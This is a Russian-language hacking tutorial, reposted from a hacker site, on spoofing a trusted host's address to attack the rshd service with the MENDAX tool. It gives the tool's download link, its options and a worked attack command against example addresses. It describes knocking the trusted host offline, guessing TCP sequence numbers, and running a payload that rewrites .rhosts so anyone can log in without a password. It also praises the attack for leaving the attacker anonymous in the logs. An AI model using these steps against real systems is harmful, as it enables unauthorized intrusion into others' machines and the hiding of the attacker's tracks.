Атака путем подделки адреса хоста

Автор: WithoutHead Сайт: http://www.nsd.ru/
   
   Для реализации данной атаки лично я использую замечательное средство под названием MENDAX (http://esperosun.chungnam.ac.kr/~jmkim/hacking/1997/11/mendax_linux.tgz) Это очень удобная программа для угадывания TCP номера и обхода демона rshd. Ниже я приведу опции командой строки mendax:
   
   $./mendax
   -p PORT -- первичный порт на локальной машине
   -s PORT -- порт сервера отправителя
   -l user -- пользователь на сервере отправителе
   -r user -- пользователь на целевой машине
   -c command -- комманда, которую необходимо выполнить
   -w PORT -- указывается порт, от которого следует ожидать пакет SYN TCP
   -d -- читать данные из стандартного входного потока и отправлять их
   -t -- проверить, будет ли атака успешной
   -L TERM -- указать, что надо обходить rlogind, а не rshd
   -S PORT -- порт, с которого следует отбирать образцы номеров по порядку
   
   Далее определимся с условностями:
   
   123.45.67.89 - компьютер, который мы атакуем
   313.37.77.77 - наша машина (с которой происходит атака)
   111.11.11.11 - хост, адресс котрого мы подделываем
   
   Теперь, пусть на машине 123.45.67.89 присутствует файл hosts.equiv, который разрешает обращение к rsh с машины 111.11.11.11.
   
   Сам файл hosts.equiv имеет следующее содержание:
   
   # /etc/hosts.equiv
   localhost
   111.11.11.11
   
   Наша задача выполнить команду rsh на машине 123.45.67.89 от юзера с машины 111.11.11.11. И в этом деле нам незаменимую помощь окажет mendax!
   
   Выполняем слудующую команду:
   
   # mendax -p 514 111.11.11.11 123.45.67.89 -l anyuser -r anyuser
   
   Теперь разберем эту команду подробнее: данная команда указывает mendax, что надо обамануть rsh путем подделки запроса с машины 111.11.11.11 к демону rshd на машине 123.45.67.89 от имени юзера anyuser.
   
   Для этого mendax для начала выводит из рабочего состояния компьютер 111.11.11.11. Если этого не сделать то 111.11.11.11 будет отвечать на пакеты присланные от 123.45.67.89. После этого mendax просматривает и анализирует генерацию номеров по порядку машиной 123.45.67.89. Затем mendax, обнаружив, что порядковые номера увеличиваются обманывает демон rshd и пытается выполнить команду (по уполномочию эта команда выглядит следующим образом: "mv .rhosts .r; echo + + > .rhost" -- данная команда создает на машине 123.45.67.89 новый файл .rhosts, а если он уже существует, то заменяет его и прописывает строку, позволяющую зарегестрироваться кому угодно, с любого хоста и без всякого пароля!).
   
   Если атака удалась, то машина 123.45.67.89 становиться полностью открытой для нас!
   
   Что еще интересно, так это то, что машина 123.45.67.89 записала в лог-файл подключение к rshd с машины 111.11.11.11! Таким образом вы остаетесь полностью анонимным!
   
   Удачи!
   

Опубликовано: HTTP://WWW.R-T-F-M.INFO, pauk ©® 2000-2011.
All rights reserved.
При перепечатки ссылка на сайт обязательна.
Мнение администрации сайта не всегда совпадает с мнением автора..